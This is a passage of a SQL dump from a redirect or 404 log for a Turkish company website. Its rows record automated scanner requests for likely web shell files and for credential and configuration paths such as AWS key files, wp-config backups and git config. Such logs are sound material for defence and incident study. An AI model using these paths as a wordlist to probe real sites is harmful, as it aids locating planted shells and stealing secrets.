00:00:00',301),(58980,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/hp2.php',NULL,'','',1,0,'2026-03-02 16:15:13','0000-00-00 00:00:00',301),(58981,'http://www.3s-technologies.com.tr/tr/wp-includes/jga.php',NULL,'','',1,0,'2026-03-02 16:15:14','0000-00-00 00:00:00',301),(58982,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/vc.php',NULL,'','',1,0,'2026-03-02 16:15:15','0000-00-00 00:00:00',301),(58983,'http://www.3s-technologies.com.tr/tr/wp-includes/widgets/widget-cache.php',NULL,'','',1,0,'2026-03-02 16:15:15','0000-00-00 00:00:00',301),(58984,'http://www.3s-technologies.com.tr/tr/wp-includes/class-wp-json-ajax.php',NULL,'','',1,0,'2026-03-02 16:15:16','0000-00-00 00:00:00',301),(58985,'http://www.3s-technologies.com.tr/tr/files/add_gasto.php',NULL,'','',1,0,'2026-03-02 16:15:17','0000-00-00 00:00:00',301),(58986,'http://www.3s-technologies.com.tr/tr/uploads/select_file.php',NULL,'','',1,0,'2026-03-02 16:15:17','0000-00-00 00:00:00',301),(58987,'http://www.3s-technologies.com.tr/tr/uploads/select_file2.php',NULL,'','',1,0,'2026-03-02 16:15:18','0000-00-00 00:00:00',301),(58988,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/detmash.php',NULL,'','',1,0,'2026-03-02 16:15:18','0000-00-00 00:00:00',301),(58989,'http://www.3s-technologies.com.tr/tr/wp-includes/text/diff/renderer/incl.php',NULL,'','',1,0,'2026-03-02 16:15:22','0000-00-00 00:00:00',301),(58990,'http://www.3s-technologies.com.tr/tr/wp-includes/sitemaps/providers.php',NULL,'','',1,0,'2026-03-02 16:15:22','0000-00-00 00:00:00',301),(58991,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/403.php',NULL,'','',1,0,'2026-03-02 16:15:23','0000-00-00 00:00:00',301),(58992,'http://www.3s-technologies.com.tr/tr/images/image.php',NULL,'','',1,0,'2026-03-02 16:15:24','0000-00-00 00:00:00',301),(58993,'http://www.3s-technologies.com.tr/tr/images/image2.php',NULL,'','',1,0,'2026-03-02 16:15:25','0000-00-00 00:00:00',301),(58994,'http://www.3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/ws.php',NULL,'','',1,0,'2026-03-02 16:15:25','0000-00-00 00:00:00',301),(58995,'http://www.3s-technologies.com.tr/tr/uploads/mandals.php',NULL,'','',1,0,'2026-03-02 16:15:26','0000-00-00 00:00:00',301),(58996,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/ws27.php',NULL,'','',1,0,'2026-03-02 16:15:27','0000-00-00 00:00:00',301),(58997,'http://www.3s-technologies.com.tr/tr/wp-includes/class-wp-duotone.php',NULL,'','',1,0,'2026-03-02 16:15:27','0000-00-00 00:00:00',301),(58998,'http://www.3s-technologies.com.tr/tr/files/d.be.brow.php',NULL,'','',1,0,'2026-03-02 16:15:28','0000-00-00 00:00:00',301),(58999,'http://www.3s-technologies.com.tr/tr/submitticket.php',NULL,'','',1,0,'2026-03-02 16:15:29','0000-00-00 00:00:00',301),(59000,'http://www.3s-technologies.com.tr/tr/files/add_evento.php',NULL,'','',1,0,'2026-03-02 16:15:30','0000-00-00 00:00:00',301),(59001,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/goods.php',NULL,'','',1,0,'2026-03-02 16:15:31','0000-00-00 00:00:00',301),(59002,'http://www.3s-technologies.com.tr/tr/wp-admin/js/goods.php',NULL,'','',1,0,'2026-03-02 16:15:31','0000-00-00 00:00:00',301),(59003,'http://www.3s-technologies.com.tr/tr/wp-admin/js/searchforma.php',NULL,'','',1,0,'2026-03-02 16:15:32','0000-00-00 00:00:00',301),(59004,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/222.php',NULL,'','',1,0,'2026-03-02 16:15:33','0000-00-00 00:00:00',301),(59005,'http://www.3s-technologies.com.tr/tr/wp-admin/js/ms-site.php',NULL,'','',1,0,'2026-03-02 16:15:34','0000-00-00 00:00:00',301),(59006,'http://www.3s-technologies.com.tr/tr/wp-includes/wp-settings2.php',NULL,'','',1,0,'2026-03-02 16:15:36','0000-00-00 00:00:00',301),(59007,'http://www.3s-technologies.com.tr/tr/admin/index.php',NULL,'','',2,0,'2026-03-02 16:15:37','0000-00-00 00:00:00',301),(59008,'http://www.3s-technologies.com.tr/tr/wp-content/upgrade/alfa-rex.php',NULL,'','',1,0,'2026-03-02 16:15:43','0000-00-00 00:00:00',301),(59009,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/wp-login.php',NULL,'','',1,0,'2026-03-02 16:15:43','0000-00-00 00:00:00',301),(59010,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/2026/02/index.php',NULL,'','',1,0,'2026-03-02 16:15:44','0000-00-00 00:00:00',301),(59011,'http://www.3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/alfa-rex.php',NULL,'','',1,0,'2026-03-02 16:15:45','0000-00-00 00:00:00',301),(59012,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/2026/01/mybackpack.php',NULL,'','',1,0,'2026-03-02 16:15:46','0000-00-00 00:00:00',301),(59013,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/rk2.php',NULL,'','',1,0,'2026-03-02 16:15:47','0000-00-00 00:00:00',301),(59014,'http://www.3s-technologies.com.tr/tr/wp-admin/css/error.php',NULL,'','',1,0,'2026-03-02 16:15:47','0000-00-00 00:00:00',301),(59015,'http://www.3s-technologies.com.tr/tr/yereongu.php',NULL,'','',1,0,'2026-03-02 16:15:49','0000-00-00 00:00:00',301),(59016,'http://www.3s-technologies.com.tr/tr/wp-admin/js/widgets/leuk.php',NULL,'','',1,0,'2026-03-02 16:15:50','0000-00-00 00:00:00',301),(59017,'http://www.3s-technologies.com.tr/tr/.well-known/chris.php',NULL,'','',1,0,'2026-03-02 16:15:50','0000-00-00 00:00:00',301),(59018,'http://www.3s-technologies.com.tr/tr/wp-includes/xx.php',NULL,'','',1,0,'2026-03-02 16:15:51','0000-00-00 00:00:00',301),(59019,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/sql.php',NULL,'','',1,0,'2026-03-02 16:15:52','0000-00-00 00:00:00',301),(59020,'http://www.3s-technologies.com.tr/tr/uploads/wp.php',NULL,'','',1,0,'2026-03-02 16:15:53','0000-00-00 00:00:00',301),(59021,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/cores.php',NULL,'','',1,0,'2026-03-02 16:15:53','0000-00-00 00:00:00',301),(59022,'http://www.3s-technologies.com.tr/tr/wp-includes/widgets/ws62.php',NULL,'','',1,0,'2026-03-02 16:15:54','0000-00-00 00:00:00',301),(59023,'http://www.3s-technologies.com.tr/tr/wp-content/upgrade/worksec.php',NULL,'','',1,0,'2026-03-02 16:15:55','0000-00-00 00:00:00',301),(59024,'http://www.3s-technologies.com.tr/tr/wp-includes/pomo/feeds.php',NULL,'','',1,0,'2026-03-02 16:15:55','0000-00-00 00:00:00',301),(59025,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/wp-good.php',NULL,'','',1,0,'2026-03-02 16:15:56','0000-00-00 00:00:00',301),(59026,'http://www.3s-technologies.com.tr/tr/wp-includes/images/signup_pad_classic.php',NULL,'','',1,0,'2026-03-02 16:15:57','0000-00-00 00:00:00',301),(59027,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/v2.php',NULL,'','',1,0,'2026-03-02 16:15:58','0000-00-00 00:00:00',301),(59028,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/class-ge.php',NULL,'','',1,0,'2026-03-02 16:15:58','0000-00-00 00:00:00',301),(59029,'http://www.3s-technologies.com.tr/tr/wp-includes/class-wp-https.php',NULL,'','',1,0,'2026-03-02 16:15:59','0000-00-00 00:00:00',301),(59030,'http://www.3s-technologies.com.tr/tr/wp-includes/fonts/rawwp.php',NULL,'','',1,0,'2026-03-02 16:16:00','0000-00-00 00:00:00',301),(59031,'http://www.3s-technologies.com.tr/tr/wp-includes/class-mail.php',NULL,'','',1,0,'2026-03-02 16:16:01','0000-00-00 00:00:00',301),(59032,'http://www.3s-technologies.com.tr/tr/.well-known/uhuybro.php',NULL,'','',1,0,'2026-03-02 16:16:02','0000-00-00 00:00:00',301),(59033,'http://www.3s-technologies.com.tr/tr/wp-admin/css/footers.php',NULL,'','',1,0,'2026-03-02 16:16:03','0000-00-00 00:00:00',301),(59034,'http://www.3s-technologies.com.tr/tr/.well-known/icedknnv.php',NULL,'','',1,0,'2026-03-02 16:16:03','0000-00-00 00:00:00',301),(59035,'http://www.3s-technologies.com.tr/tr/images/post_genprdt.php',NULL,'','',1,0,'2026-03-02 16:16:04','0000-00-00 00:00:00',301),(59036,'http://www.3s-technologies.com.tr/tr/wp-admin/css/by.php',NULL,'','',1,0,'2026-03-02 16:16:06','0000-00-00 00:00:00',301),(59037,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/user-ajax.php',NULL,'','',1,0,'2026-03-02 16:16:06','0000-00-00 00:00:00',301),(59038,'http://www.3s-technologies.com.tr/tr/wp-admin/images/chati.php',NULL,'','',1,0,'2026-03-02 16:16:07','0000-00-00 00:00:00',301),(59039,'http://www.3s-technologies.com.tr/tr/zfile.php',NULL,'','',1,0,'2026-03-02 16:16:47','0000-00-00 00:00:00',301),(59040,'http://www.3s-technologies.com.tr/tr/321.php',NULL,'','',1,0,'2026-03-02 16:16:48','0000-00-00 00:00:00',301),(59041,'http://www.3s-technologies.com.tr/tr/ant.php',NULL,'','',1,0,'2026-03-02 16:16:50','0000-00-00 00:00:00',301),(59042,'http://3s-technologies.com.tr/tr/avim.php',NULL,'','',2,0,'2026-03-02 19:07:33','0000-00-00 00:00:00',301),(59043,'http://3s-technologies.com.tr/tr/wsws.php',NULL,'','',2,0,'2026-03-02 19:07:36','0000-00-00 00:00:00',301),(59044,'http://3s-technologies.com.tr/tr/loxi-o.php',NULL,'','',2,0,'2026-03-02 19:07:38','0000-00-00 00:00:00',301),(59045,'http://3s-technologies.com.tr/tr/olfclass.php',NULL,'','',2,0,'2026-03-02 19:07:40','0000-00-00 00:00:00',301),(59046,'http://3s-technologies.com.tr/tr/ba.php',NULL,'','',1,0,'2026-03-02 19:28:25','0000-00-00 00:00:00',301),(59047,'http://3s-technologies.com.tr/tr/file61.php',NULL,'','',63,0,'2026-03-03 02:36:39','0000-00-00 00:00:00',301),(59048,'http://3s-technologies.com.tr/tr/qwas.php',NULL,'','',2,0,'2026-03-03 02:36:42','0000-00-00 00:00:00',301),(59049,'http://3s-technologies.com.tr/tr/claw.php',NULL,'','',8,0,'2026-03-03 02:36:43','0000-00-00 00:00:00',301),(59050,'http://3s-technologies.com.tr/tr/cfgy.php',NULL,'','',2,0,'2026-03-03 02:36:44','0000-00-00 00:00:00',301),(59051,'http://3s-technologies.com.tr/tr/jbuft.php',NULL,'','',2,0,'2026-03-03 02:36:44','0000-00-00 00:00:00',301),(59052,'http://3s-technologies.com.tr/tr/fvvff.php',NULL,'','',41,0,'2026-03-03 02:36:45','0000-00-00 00:00:00',301),(59053,'http://3s-technologies.com.tr/tr/vaza.php',NULL,'','',13,0,'2026-03-03 02:36:46','0000-00-00 00:00:00',301),(59054,'https://3s-technologies.com.tr/tr/frontend_dev.php/$',NULL,'','',2,0,'2026-03-03 03:02:06','0000-00-00 00:00:00',301),(59055,'http://3s-technologies.com.tr/tr/wp-scxy.php',NULL,'','',7,0,'2026-03-03 09:38:50','0000-00-00 00:00:00',301),(59056,'http://3s-technologies.com.tr/tr/ccou1.php',NULL,'','',3,0,'2026-03-03 09:38:50','0000-00-00 00:00:00',301),(59057,'http://3s-technologies.com.tr/tr/wp-the1.php',NULL,'','',4,0,'2026-03-03 09:38:51','0000-00-00 00:00:00',301),(59058,'http://mail.3s-technologies.com.tr/tr/rere.php',NULL,'','',4,0,'2026-03-03 14:30:37','0000-00-00 00:00:00',301),(59059,'http://mail.3s-technologies.com.tr/tr/xnty.php',NULL,'','',1,0,'2026-03-03 14:30:40','0000-00-00 00:00:00',301),(59060,'http://mail.3s-technologies.com.tr/tr/foxr.php',NULL,'','',4,0,'2026-03-03 14:30:41','0000-00-00 00:00:00',301),(59061,'http://mail.3s-technologies.com.tr/tr/xv23.php',NULL,'','',1,0,'2026-03-03 14:30:42','0000-00-00 00:00:00',301),(59062,'http://mail.3s-technologies.com.tr/tr/swallowable.php',NULL,'','',9,0,'2026-03-03 14:30:43','0000-00-00 00:00:00',301),(59063,'http://mail.3s-technologies.com.tr/tr/claw.php',NULL,'','',4,0,'2026-03-03 14:30:43','0000-00-00 00:00:00',301),(59064,'http://mail.3s-technologies.com.tr/tr/fvvff.php',NULL,'','',17,0,'2026-03-03 14:30:44','0000-00-00 00:00:00',301),(59065,'http://3s-technologies.com.tr/tr/rere.php',NULL,'','',6,0,'2026-03-03 16:41:48','0000-00-00 00:00:00',301),(59066,'http://3s-technologies.com.tr/tr/xnty.php',NULL,'','',1,0,'2026-03-03 16:41:53','0000-00-00 00:00:00',301),(59067,'http://3s-technologies.com.tr/tr/foxr.php',NULL,'','',6,0,'2026-03-03 16:41:54','0000-00-00 00:00:00',301),(59068,'http://3s-technologies.com.tr/tr/xv23.php',NULL,'','',1,0,'2026-03-03 16:41:54','0000-00-00 00:00:00',301),(59069,'http://3s-technologies.com.tr/tr/f.php7',NULL,'','',2,0,'2026-03-04 03:29:56','0000-00-00 00:00:00',301),(59070,'http://3s-technologies.com.tr/tr/wp-content/bnm.php',NULL,'','',1,0,'2026-03-04 03:30:13','0000-00-00 00:00:00',301),(59071,'http://3s-technologies.com.tr/tr/ad2.php',NULL,'','',2,0,'2026-03-04 03:30:20','0000-00-00 00:00:00',301),(59072,'http://3s-technologies.com.tr/tr/aki.php',NULL,'','',3,0,'2026-03-04 03:30:26','0000-00-00 00:00:00',301),(59073,'http://3s-technologies.com.tr/tr/bs4.php7',NULL,'','',1,0,'2026-03-04 03:30:32','0000-00-00 00:00:00',301),(59074,'http://3s-technologies.com.tr/tr/ftyude.php',NULL,'','',2,0,'2026-03-04 03:30:34','0000-00-00 00:00:00',301),(59075,'http://3s-technologies.com.tr/tr/wp-content/fot.php',NULL,'','',1,0,'2026-03-04 03:30:39','0000-00-00 00:00:00',301),(59076,'http://3s-technologies.com.tr/tr/wp-admin/ms-edit.php',NULL,'','',1,0,'2026-03-04 03:30:43','0000-00-00 00:00:00',301),(59077,'http://3s-technologies.com.tr/tr/wp-content/cc13.php',NULL,'','',1,0,'2026-03-04 03:30:50','0000-00-00 00:00:00',301),(59078,'http://3s-technologies.com.tr/tr/wp-admin/network/user-new.php',NULL,'','',2,0,'2026-03-04 03:30:51','0000-00-00 00:00:00',301),(59079,'http://3s-technologies.com.tr/tr/tkllu.php',NULL,'','',1,0,'2026-03-04 03:30:57','0000-00-00 00:00:00',301),(59080,'http://3s-technologies.com.tr/tr/xtsr.php',NULL,'','',5,0,'2026-03-04 03:31:02','0000-00-00 00:00:00',301),(59081,'http://3s-technologies.com.tr/tr/masks.php',NULL,'','',3,0,'2026-03-04 03:31:03','0000-00-00 00:00:00',301),(59082,'http://3s-technologies.com.tr/tr/jb33.php',NULL,'','',2,0,'2026-03-04 03:31:04','0000-00-00 00:00:00',301),(59083,'http://3s-technologies.com.tr/tr/vogme.php',NULL,'','',1,0,'2026-03-04 03:31:05','0000-00-00 00:00:00',301),(59084,'http://3s-technologies.com.tr/tr/as.php',NULL,'','',1,0,'2026-03-04 03:31:08','0000-00-00 00:00:00',301),(59085,'http://3s-technologies.com.tr/tr/advanc.php',NULL,'','',1,0,'2026-03-04 03:31:10','0000-00-00 00:00:00',301),(59086,'http://3s-technologies.com.tr/tr/ahgag.php',NULL,'','',1,0,'2026-03-04 03:31:10','0000-00-00 00:00:00',301),(59087,'http://3s-technologies.com.tr/tr/yoawv.php',NULL,'','',1,0,'2026-03-04 03:31:13','0000-00-00 00:00:00',301),(59088,'http://3s-technologies.com.tr/tr/xogve.php',NULL,'','',1,0,'2026-03-04 03:31:13','0000-00-00 00:00:00',301),(59089,'http://3s-technologies.com.tr/tr/torsa1.php',NULL,'','',41,0,'2026-03-04 03:31:17','0000-00-00 00:00:00',301),(59090,'http://3s-technologies.com.tr/tr/uxijj.php',NULL,'','',4,0,'2026-03-04 03:31:19','0000-00-00 00:00:00',301),(59091,'http://3s-technologies.com.tr/tr/yclby.php',NULL,'','',1,0,'2026-03-04 03:31:24','0000-00-00 00:00:00',301),(59092,'http://3s-technologies.com.tr/tr/wp-admin/maint/bal.php',NULL,'','',2,0,'2026-03-04 03:31:32','0000-00-00 00:00:00',301),(59093,'http://3s-technologies.com.tr/tr/state.php',NULL,'','',12,0,'2026-03-04 03:31:36','0000-00-00 00:00:00',301),(59094,'https://3s-technologies.com.tr/tr/git/config',NULL,'https://3s-technologies.com.tr/git/config','',1,0,'2026-03-04 03:50:57','0000-00-00 00:00:00',301),(59095,'http://3s-technologies.com.tr/tr/wp-includes/css/litespeed.php',NULL,'','',1,0,'2026-03-04 05:22:40','0000-00-00 00:00:00',301),(59096,'http://3s-technologies.com.tr/tr/zjokrx.php',NULL,'','',1,0,'2026-03-05 08:37:48','0000-00-00 00:00:00',301),(59097,'http://3s-technologies.com.tr/tr/x .php',NULL,'','',1,0,'2026-03-05 08:37:50','0000-00-00 00:00:00',301),(59098,'http://3s-technologies.com.tr/tr/no1.php',NULL,'','',36,0,'2026-03-05 08:37:53','0000-00-00 00:00:00',301),(59099,'http://3s-technologies.com.tr/tr/teee.php',NULL,'','',7,0,'2026-03-05 08:37:54','0000-00-00 00:00:00',301),(59100,'http://3s-technologies.com.tr/tr/elabel.php',NULL,'','',5,0,'2026-03-05 08:37:54','0000-00-00 00:00:00',301),(59101,'http://3s-technologies.com.tr/tr/baffz.php',NULL,'','',5,0,'2026-03-05 08:37:55','0000-00-00 00:00:00',301),(59102,'http://3s-technologies.com.tr/tr/ok356.php',NULL,'','',1,0,'2026-03-05 08:38:03','0000-00-00 00:00:00',301),(59103,'http://3s-technologies.com.tr/tr/jocundly.php',NULL,'','',5,0,'2026-03-05 08:38:06','0000-00-00 00:00:00',301),(59104,'http://3s-technologies.com.tr/tr/h2h.php',NULL,'','',6,0,'2026-03-05 08:38:10','0000-00-00 00:00:00',301),(59105,'http://3s-technologies.com.tr/tr/rithin.php',NULL,'','',51,0,'2026-03-05 08:38:11','0000-00-00 00:00:00',301),(59106,'http://3s-technologies.com.tr/tr/pass2.php',NULL,'','',5,0,'2026-03-05 08:38:44','0000-00-00 00:00:00',301),(59107,'http://3s-technologies.com.tr/tr/wp-content/plugins/profile-builder/assets/css/style-front-end.css',NULL,'','',1,0,'2026-03-05 09:26:11','0000-00-00 00:00:00',301),(59108,'http://mail.3s-technologies.com.tr/tr/aws_auth.php',NULL,'','',1,0,'2026-03-05 14:53:32','0000-00-00 00:00:00',301),(59109,'http://mail.3s-technologies.com.tr/tr/config_dev.php',NULL,'','',1,0,'2026-03-05 14:53:33','0000-00-00 00:00:00',301),(59110,'http://mail.3s-technologies.com.tr/tr/upload.form.php',NULL,'','',1,0,'2026-03-05 14:53:34','0000-00-00 00:00:00',301),(59111,'http://mail.3s-technologies.com.tr/tr/phpversion.php',NULL,'','',1,0,'2026-03-05 14:53:36','0000-00-00 00:00:00',301),(59112,'http://mail.3s-technologies.com.tr/tr/aww.php',NULL,'','',1,0,'2026-03-05 14:53:37','0000-00-00 00:00:00',301),(59113,'http://mail.3s-technologies.com.tr/tr/services.php',NULL,'','',1,0,'2026-03-05 14:53:38','0000-00-00 00:00:00',301),(59114,'http://mail.3s-technologies.com.tr/tr/public/rip.php',NULL,'','',2,0,'2026-03-05 14:53:39','0000-00-00 00:00:00',301),(59115,'http://mail.3s-technologies.com.tr/tr/u88.php',NULL,'','',1,0,'2026-03-05 14:53:40','0000-00-00 00:00:00',301),(59116,'http://mail.3s-technologies.com.tr/tr/config/laravolt/css/index.php',NULL,'','',1,0,'2026-03-05 14:53:44','0000-00-00 00:00:00',301),(59117,'http://mail.3s-technologies.com.tr/tr/php_info.php',NULL,'','',2,0,'2026-03-05 14:53:51','0000-00-00 00:00:00',301),(59118,'http://mail.3s-technologies.com.tr/tr/phpsysinfo.php',NULL,'','',1,0,'2026-03-05 14:53:52','0000-00-00 00:00:00',301),(59119,'http://mail.3s-technologies.com.tr/tr/product.php',NULL,'','',1,0,'2026-03-05 14:53:53','0000-00-00 00:00:00',301),(59120,'http://mail.3s-technologies.com.tr/tr/cli_bootstrap.php',NULL,'','',1,0,'2026-03-05 14:53:55','0000-00-00 00:00:00',301),(59121,'http://mail.3s-technologies.com.tr/tr/hochladen.form.php',NULL,'','',1,0,'2026-03-05 14:53:56','0000-00-00 00:00:00',301),(59122,'http://mail.3s-technologies.com.tr/tr/app/helpers/bladehelpers.php',NULL,'','',1,0,'2026-03-05 14:54:00','0000-00-00 00:00:00',301),(59123,'http://mail.3s-technologies.com.tr/tr/aws_secret_config.php',NULL,'','',1,0,'2026-03-05 14:54:00','0000-00-00 00:00:00',301),(59124,'http://mail.3s-technologies.com.tr/tr/aws-credentials.php',NULL,'','',1,0,'2026-03-05 14:54:02','0000-00-00 00:00:00',301),(59125,'http://mail.3s-technologies.com.tr/tr/php-details.php',NULL,'','',1,0,'2026-03-05 14:54:03','0000-00-00 00:00:00',301),(59126,'http://mail.3s-technologies.com.tr/tr/app_dev.php',NULL,'','',1,0,'2026-03-05 14:54:05','0000-00-00 00:00:00',301),(59127,'http://mail.3s-technologies.com.tr/tr/params.php',NULL,'','',1,0,'2026-03-05 14:54:07','0000-00-00 00:00:00',301),(59128,'http://mail.3s-technologies.com.tr/tr/filesystems.php',NULL,'','',1,0,'2026-03-05 14:54:11','0000-00-00 00:00:00',301),(59129,'http://mail.3s-technologies.com.tr/tr/session.php',NULL,'','',1,0,'2026-03-05 14:54:13','0000-00-00 00:00:00',301),(59130,'http://mail.3s-technologies.com.tr/tr/requirements.php',NULL,'','',1,0,'2026-03-05 14:54:20','0000-00-00 00:00:00',301),(59131,'http://mail.3s-technologies.com.tr/tr/aws_config.php',NULL,'','',1,0,'2026-03-05 14:54:21','0000-00-00 00:00:00',301),(59132,'http://mail.3s-technologies.com.tr/tr/g9qam3.php',NULL,'','',1,0,'2026-03-05 14:54:22','0000-00-00 00:00:00',301),(59133,'http://mail.3s-technologies.com.tr/tr/umgebung.php',NULL,'','',1,0,'2026-03-05 14:54:23','0000-00-00 00:00:00',301),(59134,'http://mail.3s-technologies.com.tr/tr/konfig.php',NULL,'','',1,0,'2026-03-05 14:54:26','0000-00-00 00:00:00',301),(59135,'http://mail.3s-technologies.com.tr/tr/zaza.php',NULL,'','',1,0,'2026-03-05 14:54:28','0000-00-00 00:00:00',301),(59136,'http://mail.3s-technologies.com.tr/tr/aws_settings.php',NULL,'','',1,0,'2026-03-05 14:54:28','0000-00-00 00:00:00',301),(59137,'http://mail.3s-technologies.com.tr/tr/hiquido.com/index.php',NULL,'','',1,0,'2026-03-05 14:54:30','0000-00-00 00:00:00',301),(59138,'http://mail.3s-technologies.com.tr/tr/g3.php',NULL,'','',1,0,'2026-03-05 14:54:32','0000-00-00 00:00:00',301),(59139,'http://mail.3s-technologies.com.tr/tr/localconf.php',NULL,'','',1,0,'2026-03-05 14:54:33','0000-00-00 00:00:00',301),(59140,'http://mail.3s-technologies.com.tr/tr/fcr.php',NULL,'','',1,0,'2026-03-05 14:54:34','0000-00-00 00:00:00',301),(59141,'http://mail.3s-technologies.com.tr/tr/app.default.php',NULL,'','',1,0,'2026-03-05 14:54:36','0000-00-00 00:00:00',301),(59142,'http://mail.3s-technologies.com.tr/tr/public/bnn_.php.php',NULL,'','',1,0,'2026-03-05 14:54:38','0000-00-00 00:00:00',301),(59143,'http://mail.3s-technologies.com.tr/tr/public/mah.php.php',NULL,'','',1,0,'2026-03-05 14:54:41','0000-00-00 00:00:00',301),(59144,'http://mail.3s-technologies.com.tr/tr/test.config.php',NULL,'','',1,0,'2026-03-05 14:54:43','0000-00-00 00:00:00',301),(59145,'http://mail.3s-technologies.com.tr/tr/aws.php',NULL,'','',3,0,'2026-03-05 14:54:44','0000-00-00 00:00:00',301),(59146,'http://mail.3s-technologies.com.tr/tr/am7l75.php',NULL,'','',1,0,'2026-03-05 14:54:46','0000-00-00 00:00:00',301),(59147,'http://mail.3s-technologies.com.tr/tr/bigdump.php',NULL,'','',1,0,'2026-03-05 14:54:53','0000-00-00 00:00:00',301),(59148,'http://mail.3s-technologies.com.tr/tr/time.php',NULL,'','',1,0,'2026-03-05 14:54:55','0000-00-00 00:00:00',301),(59149,'http://mail.3s-technologies.com.tr/tr/xin1.php',NULL,'','',1,0,'2026-03-05 14:54:57','0000-00-00 00:00:00',301),(59150,'http://mail.3s-technologies.com.tr/tr/aws_sdk_settings.php',NULL,'','',1,0,'2026-03-05 14:54:58','0000-00-00 00:00:00',301),(59151,'http://mail.3s-technologies.com.tr/tr/old_phpinfo.php',NULL,'','',1,0,'2026-03-05 14:55:01','0000-00-00 00:00:00',301),(59152,'http://mail.3s-technologies.com.tr/tr/lmfi2.php',NULL,'','',2,0,'2026-03-05 14:55:03','0000-00-00 00:00:00',301),(59153,'http://mail.3s-technologies.com.tr/tr/ihipj.php',NULL,'','',1,0,'2026-03-05 14:55:04','0000-00-00 00:00:00',301),(59154,'http://mail.3s-technologies.com.tr/tr/wp-config.backup.php',NULL,'','',1,0,'2026-03-05 14:55:06','0000-00-00 00:00:00',301),(59155,'http://mail.3s-technologies.com.tr/tr/apikeys.php',NULL,'','',1,0,'2026-03-05 14:55:07','0000-00-00 00:00:00',301),(59156,'http://mail.3s-technologies.com.tr/tr/887re4.php',NULL,'','',1,0,'2026-03-05 14:55:08','0000-00-00 00:00:00',301),(59157,'http://mail.3s-technologies.com.tr/tr/blbup.php',NULL,'','',1,0,'2026-03-05 14:55:09','0000-00-00 00:00:00',301),(59158,'http://mail.3s-technologies.com.tr/tr/var/www/wallet/index.php',NULL,'','',1,0,'2026-03-05 14:55:10','0000-00-00 00:00:00',301),(59159,'http://mail.3s-technologies.com.tr/tr/aws_credentials.php',NULL,'','',1,0,'2026-03-05 14:55:11','0000-00-00 00:00:00',301),(59160,'http://mail.3s-technologies.com.tr/tr/admin-ajax.php',NULL,'','',4,0,'2026-03-05 14:55:14','0000-00-00 00:00:00',301),(59161,'http://mail.3s-technologies.com.tr/tr/wp-konfig.php',NULL,'','',1,0,'2026-03-05 14:55:16','0000-00-00 00:00:00',301),(59162,'http://mail.3s-technologies.com.tr/tr/routes.php',NULL,'','',1,0,'2026-03-05 14:55:18','0000-00-00 00:00:00',301),(59163,'http://mail.3s-technologies.com.tr/tr/bipzx.php',NULL,'','',1,0,'2026-03-05 14:55:26','0000-00-00 00:00:00',301),(59164,'http://mail.3s-technologies.com.tr/tr/debug.php',NULL,'','',1,0,'2026-03-05 14:55:31','0000-00-00 00:00:00',301),(59165,'http://mail.3s-technologies.com.tr/tr/application.config.php',NULL,'','',1,0,'2026-03-05 14:55:33','0000-00-00 00:00:00',301),(59166,'http://mail.3s-technologies.com.tr/tr/queue.php',NULL,'','',1,0,'2026-03-05 14:55:34','0000-00-00 00:00:00',301),(59167,'http://mail.3s-technologies.com.tr/tr/groceries/index.php',NULL,'','',1,0,'2026-03-05 14:55:36','0000-00-00 00:00:00',301),(59168,'http://mail.3s-technologies.com.tr/tr/linusadmin-phpinfo.php',NULL,'','',1,0,'2026-03-05 14:55:46','0000-00-00 00:00:00',301),(59169,'http://mail.3s-technologies.com.tr/tr/xza.php',NULL,'','',1,0,'2026-03-05 14:55:47','0000-00-00 00:00:00',301),(59170,'http://mail.3s-technologies.com.tr/tr/sgd.php',NULL,'','',1,0,'2026-03-05 14:55:52','0000-00-00 00:00:00',301),(59171,'http://mail.3s-technologies.com.tr/tr/userfuns.php',NULL,'','',3,0,'2026-03-05 14:55:53','0000-00-00 00:00:00',301),(59172,'http://mail.3s-technologies.com.tr/tr/fucku.php',NULL,'','',1,0,'2026-03-05 14:55:54','0000-00-00 00:00:00',301),(59173,'http://mail.3s-technologies.com.tr/tr/php-info.php',NULL,'','',1,0,'2026-03-05 14:55:58','0000-00-00 00:00:00',301),(59174,'http://mail.3s-technologies.com.tr/tr/dd.php',NULL,'','',1,0,'2026-03-05 14:56:02','0000-00-00 00:00:00',301),(59175,'http://mail.3s-technologies.com.tr/tr/debuggen.php',NULL,'','',1,0,'2026-03-05 14:56:05','0000-00-00 00:00:00',301),(59176,'http://mail.3s-technologies.com.tr/tr/app/models/hrm/employee.php',NULL,'','',1,0,'2026-03-05 14:56:06','0000-00-00 00:00:00',301),(59177,'http://mail.3s-technologies.com.tr/tr/paths.php',NULL,'','',1,0,'2026-03-05 14:56:08','0000-00-00 00:00:00',301),(59178,'http://mail.3s-technologies.com.tr/tr/app_local.php',NULL,'','',1,0,'2026-03-05 14:56:08','0000-00-00 00:00:00',301),(59179,'http://mail.3s-technologies.com.tr/tr/aws_keys.php',NULL,'','',1,0,'2026-03-05 14:56:09','0000-00-00 00:00:00',301),(59180,'http://mail.3s-technologies.com.tr/tr/wp-konfig.backup.php',NULL,'','',1,0,'2026-03-05 14:56:11','0000-00-00 00:00:00',301),(59181,'http://mail.3s-technologies.com.tr/tr/broadcasting.php',NULL,'','',1,0,'2026-03-05 14:56:12','0000-00-00 00:00:00',301),(59182,'http://mail.3s-technologies.com.tr/tr/server_info.php',NULL,'','',1,0,'2026-03-05 14:56:13','0000-00-00 00:00:00',301),(59183,'http://mail.3s-technologies.com.tr/tr/channels.php',NULL,'','',1,0,'2026-03-05 14:56:14','0000-00-00 00:00:00',301),(59184,'http://mail.3s-technologies.com.tr/tr/xve22.php',NULL,'','',1,0,'2026-03-05 14:56:15','0000-00-00 